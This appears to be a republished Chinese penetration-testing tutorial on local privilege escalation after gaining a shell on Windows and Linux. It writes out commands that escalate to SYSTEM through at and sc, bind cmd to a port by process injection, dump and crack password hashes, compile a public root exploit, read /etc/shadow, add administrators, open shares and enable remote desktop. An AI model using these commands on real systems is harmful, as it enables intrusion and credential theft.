信息安全深透测试与工房操作系统本地提权
Posted lijie1977
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了信息安全深透测试与工房操作系统本地提权相关的知识,希望对你有一定的参考价值。
在上一期里我们讲述了怎样公鸡操作系统,那么在取得了操作系统shell的控制权后,可以进行系统提权的操作。
- windows系统下的账号提权:
查看账号的详细信息
使用AT命令去指定一个时间调度命令,at 19:39 /interactive cmd。执行后就可以从administrator账号提权到 system账号。
使用SC命令,创建一个服务命令,去重新启用一个新的窗口,类型为交互。sc Create syscmd binPath= "cmd /K start" type= own type= interact
sc start syscmd
也可以使用第三方程序pinjector.exe(进程注入),翻墙才能下载。
下载地址:http://www.tarasco.org/security/Process_Injector/
注入到PID656这个进程,用CMD这个程序,如果有人连入5555端口
现在5555端口已经打开
在核客端执行NC命令去连接对方的5555端口就可以使用CMD操作了
- 本地缓存密码提取
在浏览器里输入账号和密码后,根据提示会在浏览器里保存下来,不管是linux还是windows系统。
系统浏览器中有设置缓存的地方:
可以看到管理密码的选项:
系统中有密码管理器:
介绍windows密码恢复和查看工具,下载网站http://www.nirsoft.net/
Windows密码恢复工具:
Kali中提取linux下的windows密码工具pwdump,可烤备到windows使用:
打开软件检查本地主机文件
可以看到对应账户和密码,不过都是密文:
把它们保存为记事本文件:
拷备到kali中:
使用cat查看该文件:
使用Ophcrack解密软件对该文件里的内容进行解密:
- 利用漏洞提权
在kali下查看Microsoft 软件中的安全漏洞。网页中查找
• https://technet.microsoft.com/library/security/ms11-080
把.py烤备出来,查看一下里面的内容,可以烤到windows系统里去使用python程序去执行这个文件,不过中文版的windows无法看到提权效果,除非你会修改这个脚本要它适合中文版使用。
在英文版系统下使用效果:
Linux下的Ubuntu11.10 操作系统有个漏洞可以利用,可以先从下面的网址去查看漏洞http://old-releases.ubuntu.com/releases/11.10/
在这个版本下安装gcc软件,需要使用Ubuntu11.10的安装光盘做yum源才能使用下面的命令的安装gcc。sudo apt-cdrom add && sudo apt-get install gcc
利用gcc 18411.c -o exp,使普通账号能获得root权限。从kali中烤备到目标系统中
利用gcc生成exp文件
然后给exp文件以执行权限
直接执行此命令
此漏洞的博客地址:http://blog.zx2c4.com/749
在取得客户端的shell权限后,可以收集相关信息:
Linux系统下收集信息方法:
• /etc/resolv.conf #DNS配置
• /etc/passwd #用户账号
• /etc/shadow #用户密码
• whoami and who –a #查看当前账号,有谁登陆
• ifconfig -a, iptables -L -n, netstat –r #查看IP地址,防火墙设置,系统网关和路由
• uname –a, ps aux #查看系统版本,是否有漏洞或安装补丁。进程PID
• dpkg -l| head # 当前系统所有的安装包
Windows 系统下收集信息方法:
• ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r #IP地址配置参数,查看DNS缓存,查看路由网关
• net view , net view /domain #查网络共享,域共享
• net user /domain, net user %username% /domain #查看域账号
• net accounts, net share #查看当前机器开了哪些共享
• net localgroup administrators username /add #把账号加到管理员组的命令
• net group "Domain Controllers" /domain #域环境下查看组里的域账号
• net share name$=C:\\ /unlimited #权限允许情况下开一个共享
• net user username /active:yes /domain #域环境下启用一个锁定的账号,要有域管理员账号才行。
WMIC(WINDOWS MANAGEMENT INSTRUMENTATION):windows管理框架
• wmic nicconfig get ipaddress,macaddress #查看底层硬件信息,比如IP、MAC地址
• wmic computersystemget username #查看计算机账号
• wmic netlogin get name,lastlogon #查看用户通过网络登陆信息
• wmic process get caption, executablepath,commandline #查看当前系统进程或命令
• wmic process where name=“calc.exe" call terminate #可以结束一个进程
• wmic os get name,servicepackmajorversion #提取操作系统的版本及补丁
• wmic product get name,version #查看当前系统安装了哪些软件
• wmic product where name=“name” call uninstall /nointeractive #可以卸载某个软件
• wmic share get /ALL #查看共享文件夹
• wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections"1“ #开启远程桌面
• wmic nteventlogget path,filename, writeable #查看当前日志的名字和存放路径
这期也讲述的内容不少了,也是因为前期时间一直没有更新,这次补上吧。下次我们来讲讲无线这块的内容。
以上是关于信息安全深透测试与工房操作系统本地提权的主要内容,如果未能解决你的问题,请参考以下文章